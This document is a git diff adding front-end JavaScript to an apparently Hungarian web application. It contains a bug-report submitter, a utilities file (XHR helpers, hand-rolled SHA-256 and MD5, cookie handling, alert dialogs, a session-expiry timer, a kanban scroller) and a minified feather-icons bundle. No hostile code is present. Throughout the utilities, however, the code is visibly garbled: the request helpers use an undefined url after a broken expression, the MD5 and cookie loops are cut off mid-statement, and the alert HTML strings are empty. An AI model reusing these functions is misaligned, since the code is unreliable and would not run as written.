'Hiba történt a küldés során: ' + (result.error || 'Ismeretlen hiba')); + } + + }) + .catch(error => { + console.error('Bug report küldési hiba:', error); + GenerateAlerts('error', 'Hiba történt a bejelentés küldése során.'); + }) + .finally(() => { + bugBtn.textContent = 'Hibabejelentés 🐛'; + bugBtn.disabled = false; + }); + } + } + +})(); + + +function loadScript(url, callback) { + const script = document.createElement('script'); + script.src = url; + script.onload = () => callback && callback(); + document.head.appendChild(script); +} + +loadScript('https://szaturnusz.szatuna.hu/js/html2canvas.min.js', () => {}); diff --git a/js/default.js b/js/default.js new file mode 100644 index 0000000..d43489a --- /dev/null +++ b/js/default.js @@ -0,0 +1,848 @@ +/*! + * @license kjokmjnoi API + * Website: https://api.kjokmjnoi.hu + * Ver: 1.0.4 + */ + +/* Link funkciók */ +function get_information(link, callback) { + var xhr = new XMLHttpRequest(); + xhr.open("GET", link, true); + xhr.onreadystatechange = function() { + if (xhr.status == 200) { + if (xhr.responseText.startsWith('|$6b4ea69e17243db95f7b46c384d40370$|!')[0]; + window.location= url; + } else { + callback(xhr.responseText); + } + } else { + errorCallback(); + } + }; + xhr.send(null); + } +function get_POST_information(link, jsonBody, callback, errorCallback) { + var xhr = new XMLHttpRequest(); + xhr.open("POST", link); + xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); + xhr.onreadystatechange = function() { + if (xhr.readyState == 4) { + if (xhr.status == 200) { + if (xhr.responseText.startsWith('|$6b4ea69e17243db95f7b46c384d40370$|!')[0]; + window.location= url; + } else { + callback(xhr.responseText); + } + } else { + errorCallback(); + } + } + }; + xhr.send(jsonBody); + } + +/* Kódolók */ +function htmlspecialchar(text) { + return text.replace(/&/g, "&").replace(/>/g, ">").replace(/>>amount) | (value<<(32 - amount)); + }; + var mathPow = Math.pow; + var maxWord = mathPow(2, 32); + var lengthProperty = 'length' + var i, j; + var result = '' + var words = []; + var asciiBitLength = ascii[lengthProperty]*8; + var hash = sha256.h = sha256.h || []; + var k = sha256.k = sha256.k || []; + var primeCounter = k[lengthProperty]; + var isComposite = {}; + for (var candidate = 2; primeCounter < 64; candidate++) { + if (!isComposite[candidate]) { + for (i = 0; i < 313; i += candidate) { + isComposite[i] = candidate; + } + hash[primeCounter] = (mathPow(candidate, .5)*maxWord)|0; + k[primeCounter++] = (mathPow(candidate, 1/3)*maxWord)|0; + } + } + ascii += '\x80' + while (ascii[lengthProperty]%64 - 56) ascii += '\x00' + for (i = 0; i < ascii[lengthProperty]; i++) { + j = ascii.charCodeAt(i); + if (j>>8) return; + words[i>>2] |= j << ((3 - i)%4)*8; + } + words[words[lengthProperty]] = ((asciiBitLength/maxWord)|0); + words[words[lengthProperty]] = (asciiBitLength) + for (j = 0; j < words[lengthProperty];) { + var w = words.slice(j, j += 16); + var oldHash = hash; + hash = hash.slice(0, 8); + for (i = 0; i < 64; i++) { + var i2 = i + j; + var w15 = w[i - 15], w2 = w[i - 2]; + var a = hash[0], e = hash[4]; + var temp1 = hash[7] + + (rightRotate(e, 6) ^ rightRotate(e, 11) ^ rightRotate(e, 25)) + + ((e&hash[5])^((~e)&hash[6])) + + k[i] + + (w[i] = (i < 16) ? w[i] : ( + w[i - 16] + + (rightRotate(w15, 7) ^ rightRotate(w15, 18) ^ (w15>>>3)) + + w[i - 7] + + (rightRotate(w2, 17) ^ rightRotate(w2, 19) ^ (w2>>>10)) + )|0 + ); + var temp2 = (rightRotate(a, 2) ^ rightRotate(a, 13) ^ rightRotate(a, 22)) + + ((a&hash[1])^(a&hash[2])^(hash[1]&hash[2])); + hash = [(temp1 + temp2)|0].concat(hash); + hash[4] = (hash[4] + temp1)|0; + } + for (i = 0; i < 8; i++) { + hash[i] = (hash[i] + oldHash[i])|0; + } + } + for (i = 0; i < 8; i++) { + for (j = 3; j + 1; j--) { + var b = (hash[i]>>(j*8))&255; + result += ((b < 16) ? 0 : '') + b.toString(16); + } + } + return result; +}; +var MD5 = function (string) { + + function RotateLeft(lValue, iShiftBits) { + return (lValue<>>(32-iShiftBits)); + } + + function AddUnsigned(lX,lY) { + var lX4,lY4,lX8,lY8,lResult; + lX8 = (lX & 0x80000000); + lY8 = (lY & 0x80000000); + lX4 = (lX & 0x40000000); + lY4 = (lY & 0x40000000); + lResult = (lX & 0x3FFFFFFF)+(lY & 0x3FFFFFFF); + if (lX4 & lY4) { + return (lResult ^ 0x80000000 ^ lX8 ^ lY8); + } + if (lX4 | lY4) { + if (lResult & 0x40000000) { + return (lResult ^ 0xC0000000 ^ lX8 ^ lY8); + } else { + return (lResult ^ 0x40000000 ^ lX8 ^ lY8); + } + } else { + return (lResult ^ lX8 ^ lY8); + } + } + + function F(x,y,z) { return (x & y) | ((~x) & z); } + function G(x,y,z) { return (x & z) | (y & (~z)); } + function H(x,y,z) { return (x ^ y ^ z); } + function I(x,y,z) { return (y ^ (x | (~z))); } + + function FF(a,b,c,d,x,s,ac) { + a = AddUnsigned(a, AddUnsigned(AddUnsigned(F(b, c, d), x), ac)); + return AddUnsigned(RotateLeft(a, s), b); + }; + + function GG(a,b,c,d,x,s,ac) { + a = AddUnsigned(a, AddUnsigned(AddUnsigned(G(b, c, d), x), ac)); + return AddUnsigned(RotateLeft(a, s), b); + }; + + function HH(a,b,c,d,x,s,ac) { + a = AddUnsigned(a, AddUnsigned(AddUnsigned(H(b, c, d), x), ac)); + return AddUnsigned(RotateLeft(a, s), b); + }; + + function II(a,b,c,d,x,s,ac) { + a = AddUnsigned(a, AddUnsigned(AddUnsigned(I(b, c, d), x), ac)); + return AddUnsigned(RotateLeft(a, s), b); + }; + + function ConvertToWordArray(string) { + var lWordCount; + var lMessageLength = string.length; + var lNumberOfWords_temp1=lMessageLength + 8; + var lNumberOfWords_temp2=(lNumberOfWords_temp1-(lNumberOfWords_temp1 % 64))/64; + var lNumberOfWords = (lNumberOfWords_temp2+1)*16; + var lWordArray=Array(lNumberOfWords-1); + var lBytePosition = 0; + var lByteCount = 0; + while ( lByteCount < lMessageLength ) { + lWordCount = (lByteCount-(lByteCount % 4))/4; + lBytePosition = (lByteCount % 4)*8; + lWordArray[lWordCount] = (lWordArray[lWordCount] | (string.charCodeAt(lByteCount)<>>29; + return lWordArray; + }; + + function WordToHex(lValue) { + var WordToHexValue="",WordToHexValue_temp="",lByte,lCount; + for (lCount = 0;lCount<=3;lCount++) { + lByte = (lValue>>>(lCount*8)) & 255; + WordToHexValue_temp = "0" + lByte.toString(16); + WordToHexValue = WordToHexValue + WordToHexValue_temp.substr(WordToHexValue_temp.length-2,2); + } + return WordToHexValue; + }; + + function Utf8Encode(string) { + string = string.replace(/\r\n/g,"\n"); + var utftext = ""; + + for (var n = 0; n < string.length; n++) { + + var c = string.charCodeAt(n); + + if (c < 128) { + utftext += String.fromCharCode(c); + } + else if((c > 127) && (c < 2048)) { + utftext += String.fromCharCode((c >> 6) | 192); + utftext += String.fromCharCode((c & 63) | 128); + } + else { + utftext += String.fromCharCode((c >> 12) | 224); + utftext += String.fromCharCode(((c >> 6) & 63) | 128); + utftext += String.fromCharCode((c & 63) | 128); + } + + } + + return utftext; + }; + + var x=Array(); + var k,AA,BB,CC,DD,a,b,c,d; + var S11=7, S12=12, S13=17, S14=22; + var S21=5, S22=9 , S23=14, S24=20; + var S31=4, S32=11, S33=16, S34=23; + var S41=6, S42=10, S43=15, S44=21; + + string = Utf8Encode(string); + + x = ConvertToWordArray(string); + + a = 0x67452301; b = 0xEFCDAB89; c = 0x98BADCFE; d = 0x10325476; + + for (k=0;k 26) return null; + return abc.charAt(num - 1); + } + if (typeof n !== 'number' || n < 1 || n > 26) return null; + return abc.charAt(n - 1); +} +function padWithZero(str) { + if (str.length === 2) return str; + return str.toString().padStart(2, '0'); +} + + +/* Sütikezelés */ +function setCookie(cname, cvalue, exdays) { + var d = new Date(); + d.setTime(d.getTime() + (exdays*24*60*60*1000)); + var expires = "expires="+ d.toUTCString(); + document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/"; + } +function getCookie(cname) { + var name = cname + "="; + var decodedCookie = decodeURIComponent(document.cookie); + var ca = decodedCookie.split(';'); + for(var i = 0; i 0) && + window.matchMedia("(max-width: 768px)").matches + ); +} + + +var iscookie = getCookie("iscookie"); +if (iscookie != "") { + +} else { + var elementExists = document.getElementById("kjokmjnoi"); + if (elementExists != null) { + document.getElementById('kjokmjnoi').style.visibility='visible'; + style = "font-family: sans-serif; background-color: #2196F3; padding: 20px; color: white; opacity: 1; transition: opacity 0.6s; margin-bottom: 15px;"; + stylebtn = "font-family: sans-serif; margin-left: 15px; color: white; font-weight: bold; float: right; font-size: 22px; line-height: 20px; cursor: pointer; transition: 0.3s;"; + alert = "
    ×Info! Az oldal mĹąkĂśdĂŠsĂŠhez szĂźksĂŠgesek a cookie-k! Az oldal hasznĂĄlatĂĄval elfogadja ezt!
    "; + var posts_div=document.getElementById('kjokmjnoi'); + posts_div.innerHTML = alert; + setCookie("iscookie", "true", 365); + setTimeout(() => { window.scrollTo(0, 0); }, 10); + } + } +var close = document.getElementsByClassName("closebtn"); +var i; +for (i = 0; i < close.length; i++) { + close[i].onclick = function(){ + var div = this.parentElement; + div.style.opacity = "0"; + setTimeout(function(){ div.style.display = "none"; }, 600); + } + } + +/* Window Funkció */ +const win = document.getElementById("win"); +const wintitle = document.getElementById("wintitle"); +const winapp = document.getElementById("winapp"); +const winloading = document.getElementById("winloading"); +function openwin() { + win.classList.remove("closed"); +} +function closewin() { + win.classList.add("closed"); +} +function fullscrn(isfull = null) { + if (isfull == null) { + if(document.getElementById("fullscrnbtn").classList.contains("close")) { + win.classList.remove("fullscrn"); + document.getElementById("fullscrnbtn").classList.remove("close"); + } else { + win.classList.add("fullscrn"); + document.getElementById("fullscrnbtn").classList.add("close"); + } + } else if (isfull) { + win.classList.add("fullscrn"); + document.getElementById("fullscrnbtn").classList.add("close"); + } else { + win.classList.remove("fullscrn"); + document.getElementById("fullscrnbtn").classList.remove("close"); + } + +} +function Loading(isloading = true) { + if (isloading) { + document.getElementById("winloading").classList.remove("hidden"); + document.getElementById("loadingBG").classList.add("active") + } else { + document.getElementById("winloading").classList.add("hidden") + document.getElementById("loadingBG").classList.remove("active") + } +} + +/* Alert funkciók */ +function GenerateID(length = 8) { + const characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; + let randomId = ''; + for (let i = 0; i < length; i++) { + const randomIndex = Math.floor(Math.random() * characters.length); + randomId += characters[randomIndex]; + } + return randomId; +} +function GenerateAlerts(type, message, disappearing = true) { + const errorElements = document.querySelectorAll('#errorDIV'); + let spanstyle = "'none'"; + errorElements.forEach(function(element) { + const randomId = type + GenerateID(16); + let alertHtml = ''; + if (type == "error") { + alertHtml = '
    ×Hiba! '+message+'
    '; + } else if (type == "success") { + alertHtml = '
    ×Siker! '+message+'
    '; + } else if (type == "info") { + alertHtml = '
    ×Info! '+message+'
    '; + } else if (type == "warning") { + alertHtml = '
    ×Figyelem! '+message+'
    '; + } + element.innerHTML += alertHtml; + if (disappearing) { + setTimeout(() => { + const alertElement = document.getElementById(randomId); + if (alertElement) { + alertElement.remove(); + } + }, 10000); + } + }); +} + + +/* Név korrektálás */ +function adjustFontSize() { + const container = document.getElementById("userNameDiv"); + const text = document.getElementById("userNameP"); + let fontSize = 16; + text.style.fontSize = "16px"; + + while (text.scrollHeight > container.clientHeight || text.scrollWidth > container.clientWidth) { + fontSize--; + text.style.fontSize = fontSize + "px"; + + if (fontSize <= 8) { + break; + } + } +} + +if (document.getElementById("userNameP") !== null && document.getElementById("userNameDiv") !== null) { + window.onload = adjustFontSize; + window.onresize = adjustFontSize; +} + +/* LogOut timer és vissza LogIn */ +let reLogInPopup; +function ReLogIn() { + reLogInPopup = window.open(window.location.origin + '?noredirect=1', 'Belépés', 'width=860,height=860'); +} +function ReLogInClose() { + try { + reLogInPopup.location.href = window.location.origin + '/managers/template/loggedin.html'; + reLogInPopup.close(); + } catch (e) { + console.error('Close error:', e.message); + } + reLogInPopup = null; +} +if (document.getElementById("TimeBeforeLogOutSpan") !== null) { + const timerSpan = document.getElementById('TimeBeforeLogOutSpan'); + + var theAlertedSessionEnd = null; + const update = () => { + const authTimer = getCookie('auth_timer'); + + if (!authTimer || isNaN(authTimer)) { + return; + } + + const expiry = parseInt(authTimer) * 1000; + const now = Date.now(); + const remaining = Math.max(0, Math.floor((expiry - now) / 1000)); + + if (remaining <= 0) { + timerSpan.textContent = 'Lejárt munkamenet'; + timerSpan.style.opacity = '1'; + timerSpan.style.right = '210px'; + timerSpan.style.color = 'red'; + if (theAlertedSessionEnd == null) { + const html = `

    Az ön munkamenete lejárt!
    Kérjük, jelentkezzen be újra!

    +
    + + `; + theAlertedSessionEnd = CreateAlertBox('Lejárt munkamenet', html, false); + } + return; + } + + if (theAlertedSessionEnd != null) { + CloseAlertBox(theAlertedSessionEnd); + theAlertedSessionEnd = null; + } + if (reLogInPopup != null && !reLogInPopup.closed) { + ReLogInClose(); + } + + const minutes = Math.floor(remaining / 60); + const seconds = remaining % 60; + timerSpan.textContent = `${minutes}:${seconds.toString().padStart(2, '0')}`; + timerSpan.style.opacity = '0.4'; + timerSpan.style.right = '10px'; + timerSpan.style.color = 'var(--panelcolor)'; + }; + + update(); + setInterval(update, 1000); +} + +/* Feedback Státusz */ +function FeedbackButtonStatus(status = "loading", id) { + var FeedbackButton = document.getElementById(id); + + if (status == "loading") { + FeedbackButton.disabled = true; + FeedbackButton.classList.add('loading'); + } else if (status == "complete") { + FeedbackButton.classList.add('complete'); + setTimeout(() => { + FeedbackButton.classList.remove("loading"); + FeedbackButton.classList.remove("complete"); + FeedbackButton.disabled = false; + }, 6000); + } else { + FeedbackButton.classList.add('failed'); + setTimeout(() => { + FeedbackButton.classList.remove("loading"); + FeedbackButton.classList.remove("failed"); + FeedbackButton.disabled = false; + }, 6000); + } +} + +/* Typing szimuláció */ +var TypingMax = 0; +var isSimulateTyping = false; +function getRandomNumber(min, max) { return Math.floor(Math.random() * (max - min + 1)) + min;} +function SimulateTypingProtector(text, elementId) { + if (isSimulateTyping) { + setTimeout(function() { + SimulateTyping(text, elementId); + }, TypingMax); + } else { + SimulateTyping(text, elementId); + } +} +function SimulateTyping(text, elementId) { + var element = document.getElementById(elementId); + var delaymin = 20; + var delaymax = 40; + var index = 0; + TypingMax = text.length * delaymax; + isSimulateTyping = true; + var timer = setInterval(function() { + if (index < text.length) { + var char = text.charAt(index); + element.innerHTML += char; + index++; + } else { + clearInterval(timer); + isSimulateTyping = false; + } + }, getRandomNumber(delaymin, delaymax)); +} + +/* Kanban board */ + +if (document.querySelector('.kanban-board') !== null) { + document.addEventListener('DOMContentLoaded', () => { + const board = document.querySelector('.kanban-board'); + let isDown = false; + let startX; + let scrollLeft; + + board.addEventListener('mousedown', (e) => { + isDown = true; + board.classList.add('active'); + startX = e.pageX - board.offsetLeft; + scrollLeft = board.scrollLeft; + }); + + board.addEventListener('mouseleave', () => { + isDown = false; + board.classList.remove('active'); + }); + + board.addEventListener('mouseup', () => { + isDown = false; + board.classList.remove('active'); + }); + + board.addEventListener('mousemove', (e) => { + if (!isDown) return; + e.preventDefault(); + const x = e.pageX - board.offsetLeft; + const walk = (x - startX) * 1.5; + board.scrollLeft = scrollLeft - walk; + }); + }); +} + +/* AlertBox */ +function CreateAlertBox(title, html, closeable = true) { + // Overlay létrehozása + const overlay = document.createElement('div'); + overlay.className = 'alert-overlay'; + overlay.style.cssText = ` + position: fixed; + top: 0; + left: 0; + width: 100%; + height: 100%; + background: rgba(0, 0, 0, 0.5); + backdrop-filter: blur(3px); + display: flex; + justify-content: center; + align-items: center; + z-index: ${1000 + document.querySelectorAll('.alert-overlay').length}; + `; + + // AlertBox div létrehozása + const alertBox = document.createElement('div'); + alertBox.className = 'alert-box'; + alertBox.style.cssText = ` + width: 25%; + min-width: 300px; + max-width: 600px; + max-height: 600px; + background: var(--toppanel); + border-radius: 4px; + box-shadow: 1 5px 10px #aaaaaa; + position: relative; + overflow: hidden; + display: flex; + flex-direction: column; + `; + + // Header létrehozása + const header = document.createElement('div'); + header.style.cssText = ` + padding: 8px 20px; + border-bottom: 1px solid #bdc3c7; + display: flex; + justify-content: space-between; + align-items: center; + flex-shrink: 0; + background-color: var(--panelcolor); + `; + + // Title h2 elem + const titleElement = document.createElement('h2'); + titleElement.textContent = title; + titleElement.style.cssText = ` + margin: 0; + font-size: 18px; + color: #f5f5f5; + `; + + header.appendChild(titleElement); + + // Close gomb ha closeable + if (closeable) { + const closeButton = document.createElement('button'); + closeButton.innerHTML = '×'; + closeButton.style.cssText = ` + background: none; + border: none; + font-size: 24px; + color: #f5f5f5; + cursor: pointer; + padding: 0; + margin: 0; + width: 30px; + height: 30px; + display: flex; + align-items: center; + justify-content: center; + border-radius: 50%; + transition: background-color 0.2s; + `; + + closeButton.onmouseover = () => closeButton.style.backgroundColor = '#f0f0f0'; + closeButton.onmouseout = () => closeButton.style.backgroundColor = 'transparent'; + closeButton.onclick = () => CloseAlertBox(overlay); + + header.appendChild(closeButton); + } + + // Content terület + const content = document.createElement('div'); + content.innerHTML = html; + content.style.cssText = ` + padding: 0px 20px 20px 20px; + overflow-y: auto; + flex-grow: 1; + text-align: justify; + `; + + // Összeállítás + alertBox.appendChild(header); + alertBox.appendChild(content); + overlay.appendChild(alertBox); + + // DOM-hoz hozzáadás + document.body.appendChild(overlay); + + // Animáció + overlay.style.opacity = '0'; + alertBox.style.transform = 'scale(0.8)'; + + requestAnimationFrame(() => { + overlay.style.transition = 'opacity 0.3s ease'; + alertBox.style.transition = 'transform 0.3s ease'; + overlay.style.opacity = '1'; + alertBox.style.transform = 'scale(1)'; + }); + + return overlay; +} + +function CloseAlertBox(overlay) { + if (!overlay) return; + + overlay.style.transition = 'opacity 0.3s ease'; + overlay.querySelector('.alert-box').style.transition = 'transform 0.3s ease'; + overlay.style.opacity = '0'; + overlay.querySelector('.alert-box').style.transform = 'scale(0.8)'; + + setTimeout(() => { + if (overlay.parentNode) { + overlay.parentNode.removeChild(overlay); + } + }, 300); +} diff --git a/js/feather-icons.js b/js/feather-icons.js new file mode 100644 index 0000000..39e0111 --- /dev/null +++ b/js/feather-icons.js @@ -0,0 +1,13 @@ +!function(e,n){"object"==typeof exports&&"object"==typeof module?module.exports=n():"function"==typeof define&&define.amd?define([],n):"object"==typeof exports?exports.feather=n():e.feather=n()}("undefined"!=typeof self?self:this,function(){return function(e){var n={};function i(t){if(n[t])return n[t].exports;var l=n[t]={i:t,l:!1,exports:{}};return e[t].call(l.exports,l,l.exports,i),l.l=!0,l.exports}return i.m=e,i.c=n,i.d=function(e,n,t){i.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:t})},i.r=function(e){Object.defineProperty(e,"__esModule",{value:!0})},i.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(n,"a",n),n},i.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},i.p="",i(i.s=80)}([function(e,n,i){(function(n){var i="object",t=function(e){return e&&e.Math==Math&&e};e.exports=t(typeof globalThis==i&&globalThis)||t(typeof window==i&&window)||t(typeof self==i&&self)||t(typeof n==i&&n)||Function("return this")()}).call(this,i(75))},function(e,n){var i={}.hasOwnProperty;e.exports=function(e,n){return i.call(e,n)}},function(e,n,i){var t=i(0),l=i(11),r=i(33),o=i(62),a=t.Symbol,c=l("wks");e.exports=function(e){return c[e]||(c[e]=o&&a[e]||(o?a:r)("Symbol."+e))}},function(e,n,i){var t=i(6);e.exports=function(e){if(!t(e))throw TypeError(String(e)+" is not an object");return e}},function(e,n){e.exports=function(e){try{return!!e()}catch(e){return!0}}},function(e,n,i){var t=i(8),l=i(7),r=i(10);e.exports=t?function(e,n,i){return l.f(e,n,r(1,i))}:function(e,n,i){return e[n]=i,e}},function(e,n){e.exports=function(e){return"object"==typeof e?null!==e:"function"==typeof e}},function(e,n,i){var t=i(8),l=i(35),r=i(3),o=i(18),a=Object.defineProperty;n.f=t?a:function(e,n,i){if(r(e),n=o(n,!0),r(i),l)try{return a(e,n,i)}catch(e){}if("get"in i||"set"in i)throw TypeError("Accessors not supported");return"value"in i&&(e[n]=i.value),e}},function(e,n,i){var t=i(4);e.exports=!t(function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a})},function(e,n){e.exports={}},function(e,n){e.exports=function(e,n){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:n}}},function(e,n,i){var t=i(0),l=i(19),r=i(17),o=t["__core-js_shared__"]||l("__core-js_shared__",{});(e.exports=function(e,n){return o[e]||(o[e]=void 0!==n?n:{})})("versions",[]).push({version:"3.1.3",mode:r?"pure":"global",copyright:"© 2019 Denis Pushkarev (zloirock.ru)"})},function(e,n,i){"use strict";Object.defineProperty(n,"__esModule",{value:!0});var t=o(i(43)),l=o(i(41)),r=o(i(40));function o(e){return e&&e.__esModule?e:{default:e}}n.default=Object.keys(l.default).map(function(e){return new t.default(e,l.default[e],r.default[e])}).reduce(function(e,n){return e[n.name]=n,e},{})},function(e,n){e.exports=["constructor","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","valueOf"]},function(e,n,i){var t=i(72),l=i(20);e.exports=function(e){return t(l(e))}},function(e,n){e.exports={}},function(e,n,i){var t=i(11),l=i(33),r=t("keys");e.exports=function(e){return r[e]||(r[e]=l(e))}},function(e,n){e.exports=!1},function(e,n,i){var t=i(6);e.exports=function(e,n){if(!t(e))return e;var i,l;if(n&&"function"==typeof(i=e.toString)&&!t(l=i.call(e)))return l;if("function"==typeof(i=e.valueOf)&&!t(l=i.call(e)))return l;if(!n&&"function"==typeof(i=e.toString)&&!t(l=i.call(e)))return l;throw TypeError("Can't convert object to primitive value")}},function(e,n,i){var t=i(0),l=i(5);e.exports=function(e,n){try{l(t,e,n)}catch(i){t[e]=n}return n}},function(e,n){e.exports=function(e){if(void 0==e)throw TypeError("Can't call method on "+e);return e}},function(e,n){var i=Math.ceil,t=Math.floor;e.exports=function(e){return isNaN(e=+e)?0:(e>0?t:i)(e)}},function(e,n,i){var t; +/*! + Copyright (c) 2016 Jed Watson. + Licensed under the MIT License (MIT), see + http://jedwatson.github.io/classnames +*/ +/*! + Copyright (c) 2016 Jed Watson. + Licensed under the MIT License (MIT), see + http://jedwatson.github.io/classnames +*/ +!function(){"use strict";var i=function(){function e(){}function n(e,n){for(var i=n.length,t=0;t0?l(t(e),9007199254740991):0}},function(e,n,i){var t=i(1),l=i(14),r=i(68),o=i(15),a=r(!1);e.exports=function(e,n){var i,r=l(e),c=0,p=[];for(i in r)!t(o,i)&&t(r,i)&&p.push(i);for(;n.length>c;)t(r,i=n[c++])&&(~a(p,i)||p.push(i));return p}},function(e,n,i){var t=i(0),l=i(11),r=i(5),o=i(1),a=i(19),c=i(36),p=i(37),y=p.get,h=p.enforce,x=String(c).split("toString");l("inspectSource",function(e){return c.call(e)}),(e.exports=function(e,n,i,l){var c=!!l&&!!l.unsafe,p=!!l&&!!l.enumerable,y=!!l&&!!l.noTargetGet;"function"==typeof i&&("string"!=typeof n||o(i,"name")||r(i,"name",n),h(i).source=x.join("string"==typeof n?n:"")),e!==t?(c?!y&&e[n]&&(p=!0):delete e[n],p?e[n]=i:r(e,n,i)):p?e[n]=i:a(n,i)})(Function.prototype,"toString",function(){return"function"==typeof this&&y(this).source||c.call(this)})},function(e,n){var i={}.toString;e.exports=function(e){return i.call(e).slice(8,-1)}},function(e,n,i){var t=i(8),l=i(73),r=i(10),o=i(14),a=i(18),c=i(1),p=i(35),y=Object.getOwnPropertyDescriptor;n.f=t?y:function(e,n){if(e=o(e),n=a(n,!0),p)try{return y(e,n)}catch(e){}if(c(e,n))return r(!l.f.call(e,n),e[n])}},function(e,n,i){var t=i(0),l=i(31).f,r=i(5),o=i(29),a=i(19),c=i(71),p=i(65);e.exports=function(e,n){var i,y,h,x,s,u=e.target,d=e.global,f=e.stat;if(i=d?t:f?t[u]||a(u,{}):(t[u]||{}).prototype)for(y in n){if(x=n[y],h=e.noTargetGet?(s=l(i,y))&&s.value:i[y],!p(d?y:u+(f?".":"#")+y,e.forced)&&void 0!==h){if(typeof x==typeof h)continue;c(x,h)}(e.sham||h&&h.sham)&&r(x,"sham",!0),o(i,y,x,e)}}},function(e,n){var i=0,t=Math.random();e.exports=function(e){return"Symbol(".concat(void 0===e?"":e,")_",(++i+t).toString(36))}},function(e,n,i){var t=i(0),l=i(6),r=t.document,o=l(r)&&l(r.createElement);e.exports=function(e){return o?r.createElement(e):{}}},function(e,n,i){var t=i(8),l=i(4),r=i(34);e.exports=!t&&!l(function(){return 7!=Object.defineProperty(r("div"),"a",{get:function(){return 7}}).a})},function(e,n,i){var t=i(11);e.exports=t("native-function-to-string",Function.toString)},function(e,n,i){var t,l,r,o=i(76),a=i(0),c=i(6),p=i(5),y=i(1),h=i(16),x=i(15),s=a.WeakMap;if(o){var u=new s,d=u.get,f=u.has,g=u.set;t=function(e,n){return g.call(u,e,n),n},l=function(e){return d.call(u,e)||{}},r=function(e){return f.call(u,e)}}else{var v=h("state");x[v]=!0,t=function(e,n){return p(e,v,n),n},l=function(e){return y(e,v)?e[v]:{}},r=function(e){return y(e,v)}}e.exports={set:t,get:l,has:r,enforce:function(e){return r(e)?l(e):t(e,{})},getterFor:function(e){return function(n){var i;if(!c(n)||(i=l(n)).type!==e)throw TypeError("Incompatible receiver, "+e+" required");return i}}}},function(e,n,i){"use strict";Object.defineProperty(n,"__esModule",{value:!0});var t=Object.assign||function(e){for(var n=1;n0&&void 0!==arguments[0]?arguments[0]:{};if("undefined"==typeof document)throw new Error("`feather.replace()` only works in a browser environment.");var n=document.querySelectorAll("[data-feather]");Array.from(n).forEach(function(n){return function(e){var n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=function(e){return Array.from(e.attributes).reduce(function(e,n){return e[n.name]=n.value,e},{})}(e),o=i["data-feather"];if(delete i["data-feather"],void 0!==r.default[o]){var a=r.default[o].toSvg(t({},n,i,{class:(0,l.default)(n.class,i.class)})),c=(new DOMParser).parseFromString(a,"image/svg+xml").querySelector("svg");e.parentNode.replaceChild(c,e)}else console.warn("feather: '"+o+"' is not a valid icon")}(n,e)})}},function(e,n,i){"use strict";Object.defineProperty(n,"__esModule",{value:!0});var t,l=i(12),r=(t=l)&&t.__esModule?t:{default:t};n.default=function(e){var n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};if(console.warn("feather.toSvg() is deprecated. Please use feather.icons[name].toSvg() instead."),!e)throw new Error("The required `key` (icon name) parameter is missing.");if(!r.default[e])throw new Error("No icon matching '"+e+"'. See the complete list of icons at https://feathericons.com");return r.default[e].toSvg(n)}},function(e){e.exports={activity:["pulse","health","action","motion"],airplay:["stream","cast","mirroring"],"alert-circle":["warning","alert","danger"],"alert-octagon":["warning","alert","danger"],"alert-triangle":["warning","alert","danger"],"align-center":["text alignment","center"],"align-justify":["text alignment","justified"],"align-left":["text alignment","left"],"align-right":["text alignment","right"],anchor:[],archive:["index","box"],"at-sign":["mention","at","email","message"],award:["achievement","badge"],aperture:["camera","photo"],"bar-chart":["statistics","diagram","graph"],"bar-chart-2":["statistics","diagram","graph"],battery:["power","electricity"],"battery-charging":["power","electricity"],bell:["alarm","notification","sound"],"bell-off":["alarm","notification","silent"],bluetooth:["wireless"],"book-open":["read","library"],book:["read","dictionary","booklet","magazine","library"],bookmark:["read","clip","marker","tag"],box:["cube"],briefcase:["work","bag","baggage","folder"],calendar:["date"],camera:["photo"],cast:["chromecast","airplay"],"chevron-down":["expand"],"chevron-up":["collapse"],circle:["off","zero","record"],clipboard:["copy"],clock:["time","watch","alarm"],"cloud-drizzle":["weather","shower"],"cloud-lightning":["weather","bolt"],"cloud-rain":["weather"],"cloud-snow":["weather","blizzard"],cloud:["weather"],codepen:["logo"],codesandbox:["logo"],code:["source","programming"],coffee:["drink","cup","mug","tea","cafe","hot","beverage"],columns:["layout"],command:["keyboard","cmd","terminal","prompt"],compass:["navigation","safari","travel","direction"],copy:["clone","duplicate"],"corner-down-left":["arrow","return"],"corner-down-right":["arrow"],"corner-left-down":["arrow"],"corner-left-up":["arrow"],"corner-right-down":["arrow"],"corner-right-up":["arrow"],"corner-up-left":["arrow"],"corner-up-right":["arrow"],cpu:["processor","technology"],"credit-card":["purchase","payment","cc"],crop:["photo","image"],crosshair:["aim","target"],database:["storage","memory"],delete:["remove"],disc:["album","cd","dvd","music"],"dollar-sign":["currency","money","payment"],droplet:["water"],edit:["pencil","change"],"edit-2":["pencil","change"],"edit-3":["pencil","change"],eye:["view","watch"],"eye-off":["view","watch","hide","hidden"],"external-link":["outbound"],facebook:["logo","social"],"fast-forward":["music"],figma:["logo","design","tool"],"file-minus":["delete","remove","erase"],"file-plus":["add","create","new"],"file-text":["data","txt","pdf"],film:["movie","video"],filter:["funnel","hopper"],flag:["report"],"folder-minus":["directory"],"folder-plus":["directory"],folder:["directory"],framer:["logo","design","tool"],frown:["emoji","face","bad","sad","emotion"],gift:["present","box","birthday","party"],"git-branch":["code","version control"],"git-commit":["code","version control"],"git-merge":["code","version control"],"git-pull-request":["code","version control"],github:["logo","version control"],gitlab:["logo","version control"],globe:["world","browser","language","translate"],"hard-drive":["computer","server","memory","data"],hash:["hashtag","number","pound"],headphones:["music","audio","sound"],heart:["like","love","emotion"],"help-circle":["question mark"],hexagon:["shape","node.js","logo"],home:["house","living"],image:["picture"],inbox:["email"],instagram:["logo","camera"],key:["password","login","authentication","secure"],layers:["stack"],layout:["window","webpage"],"life-buoy":["help","life ring","support"],link:["chain","url"],"link-2":["chain","url"],linkedin:["logo","social media"],list:["options"],lock:["security","password","secure"],"log-in":["sign 